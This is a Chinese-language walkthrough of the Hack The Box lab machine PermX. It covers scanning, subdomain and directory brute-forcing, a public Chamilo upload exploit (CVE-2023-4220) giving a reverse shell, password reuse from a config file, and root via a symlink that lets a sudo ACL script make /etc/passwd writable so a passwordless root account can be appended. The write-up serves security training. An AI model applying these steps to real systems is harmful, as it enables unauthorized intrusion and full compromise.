Permx靶機筆記
概述
permx靶機是HTB的簡單靶機,這臺靶機整體考驗滲透人員的資訊蒐集能力,可以收只有資訊蒐集的快速,才能快速拿到它的flag。
整體是比較簡單的靶機
靶機連線:https://app.hackthebox.com/machines/PermX
一、nmap掃描
1)埠掃描
nmap -sT --min-rate 10000 -p- -o ports 10.10.11.23
Nmap scan report for 10.10.11.23
Host is up (2.4s latency).
Not shown: 65495 filtered tcp ports (no-response), 38 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Tue Aug 6 09:44:09 2024 -- 1 IP address (1 host up) scanned in 327.15 seconds
2)詳細資訊掃描
nmap -sT -sV -sC -O -p22,80 -o detail 10.10.11.23
Nmap scan report for 10.10.11.23
Host is up (2.7s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e25c5d8c473ed872f7b4800349866def (ECDSA)
|_ 256 1f41028e6b17189ca0ac5423e9713017 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.6 (93%), Linux 5.4 (93%), Linux 3.8 (92%), QNAP QTS 4.0 - 4.2 (92%), Linux 5.3 - 5.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 6 09:57:53 2024 -- 1 IP address (1 host up) scanned in 133.37 seconds
看到``http-title: Did not follow redirect to http://permx.htb`
我們去/etc/hosts檔案中繫結域名
sudo vi /etc/hosts
把10.10.11.23 permx.htb
寫進去
二、訪問web
http://permx.htb
開始爆破子域名
sudo gobuster dns -d permx.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[sudo] kali 的密碼:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: permx.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: lms.permx.htb
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================
看到結果lms.permx.htb
同樣寫到/etc/hosts
檔案中,開啟瀏覽器進行訪問。
一個登入視窗,應該是cms。網上找一下有沒有漏洞公開資訊。同時進行目錄爆破,看有沒有一些頁面資訊。
1)目錄爆破
sudo gobuster dir -u http://lms.permx.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://lms.permx.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/main (Status: 301) [Size: 313] [--> http://lms.permx.htb/main/]
/web (Status: 301) [Size: 312] [--> http://lms.permx.htb/web/]
/documentation (Status: 301) [Size: 322] [--> http://lms.permx.htb/documentation/]
/bin (Status: 301) [Size: 312] [--> http://lms.permx.htb/bin/]
/src (Status: 301) [Size: 312] [--> http://lms.permx.htb/src/]
/app (Status: 301) [Size: 312] [--> http://lms.permx.htb/app/]
/vendor (Status: 301) [Size: 315] [--> http://lms.permx.htb/vendor/]
/LICENSE (Status: 200) [Size: 35147]
/plugin (Status: 301) [Size: 315] [--> http://lms.permx.htb/plugin/]
/certificates (Status: 301) [Size: 321] [--> http://lms.permx.htb/certificates/]
Progress: 39913 / 220561 (18.10%)
/custompages (Status: 301) [Size: 320] [--> http://lms.permx.htb/custompages/]
/server-status (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
也沒什麼有用的路徑洩露出來
2)CVE搜尋
找到了一個檔案上傳的漏洞CVE-2023-4220
exploit:https://github.com/Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit
php-reverse-shell:https://pentestmonkey.net/tools/web-shells/php-reverse-shell
三、獲得立足點
兩個檔案下載下來
修改一下reverse.php
檔案的ip地址和埠
chmod +x chamilo-exp.sh
成功獲得立足點
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-color # 可以用clear清屏
我們在使用者目錄下發現了mtz使用者
四、獲得mtz使用者許可權
find / -name configuration.php 2> /dev/null
找到了chamilo的配置檔案,去開啟看看
cat /var/www/chamilo/app/config/configuration.php
cat /var/www/chamilo/plugin/sepe/src/configuration.php
在app目錄下的配置檔案中,我們看到了資料庫的使用者名稱和密碼
我們連線資料庫
mysql -u chamilo -p03F6lY3uXAP2bkW8
成功進入資料庫
這裡有admin和password的hash值
用hashcat等工具嘗試破解hash值,可惜一無所獲
我們想一下,這個資料庫的密碼03F6lY3uXAP2bkW8 會不會和它ssh使用者mtz的密碼一樣呢 嘗試一下
sudo ssh mtz@10.10.11.23
03F6lY3uXAP2bkW8
發現使用者flag
五、提權到root
sudo -l 看到有一個指令碼
#!/bin/bash
if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
因為檔案是不可寫的,我們只能審計一下這個指令碼檔案,看看能不能完成提權了。
這裡阻止了一些惡意的操作,我們可以嘗試鏈檔案
mtz@permx:~:$ touch test
mtz@permx:~:$ ln -sf /etc/passwd /home/mtz/test
mtz@permx:~:$ sudo /opt/acl.sh mtz rw /home/mtz/test
mtz@permx:~:$ echo "lingx5::0:0:lingx5:/root:/bin/bash" >> ./test
mtz@permx:~:$ su lingx5
root@permx:/home/mtz:#
成功拿到root的flag
總結
- 我們用nmap掃描,探測出了目標服務有http和ssh服務,對http服務進行子域名列舉,在它的旁站中,我們發現他是一個cms的架構
- 在github上找到了chamilo框架的CVE-2023-4220漏洞,根據github上的教程利用exp,成功後的了www-data使用者許可權。
- 在chamilo框架的配置檔案中,我們發現mysql資料庫的配置資訊,可以成功登陸資料庫,但是admin的密碼是hash值很難破解。
- 我們想到mysql和ssh會不會存在撞庫的可能(兩者密碼是一樣的),我們在home目錄下發現mtz使用者,嘗試ssh連線,成功獲得mtz使用者的許可權
- 在mtz的sudo列表中看到了
/opt/acl.sh
檔案,透過對shell指令碼的審計,我們發現這個指令碼可以給/home/mtz/*
的檔案賦許可權,由此我們利用軟連線的方式,獲得/etc/passwd
的寫許可權,成功提權到root。